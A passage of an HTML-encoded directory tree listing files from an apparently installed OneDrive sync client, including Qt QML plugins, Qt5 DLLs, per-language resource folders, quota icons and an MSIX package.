&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RadioButton.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollBar.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollIndicator.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScrollView.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; TextField.qml
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Extras
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qtquickextrasplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Layouts
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qquicklayoutsplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Templates.2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; qtquicktemplates2plugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Window.2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; windowplugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; QtQuick.2
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; plugins.qmltypes
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; qmldir
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; qtquick2plugin.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Core.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5DBus.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Gui.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Network.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5PrintSupport.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Qml.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5QmlModels.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5QmlWorkerScript.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5QuickControls2.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Quick.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5QuickTemplates2.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Svg.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5Widgets.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Qt5WinExtras.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; quc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaCritical_default.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaCritical_Win11.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaError.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaFull_default.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaFull_Win11.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaNearing.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; QuotaOverLimit_default.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; quotawarning_dark.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; quotawarning_light.png
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; quz-PE
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ReactNativePicker.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; resources.pri
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; RNSVG.dll
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ro
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ru
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; rw
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ScreenshotOptIn.gif
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sk
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sl
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sourcemaps
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; react
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; index.windows.bundle.map
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; SparsePackage
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; OneDriveSync.msix
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sq
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sr-Cyrl-BA
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sr-Cyrl-RS
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sr-Latn-RS
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; sv
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; FileSync.LocalizedResources.dll.mui
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; localizable.json
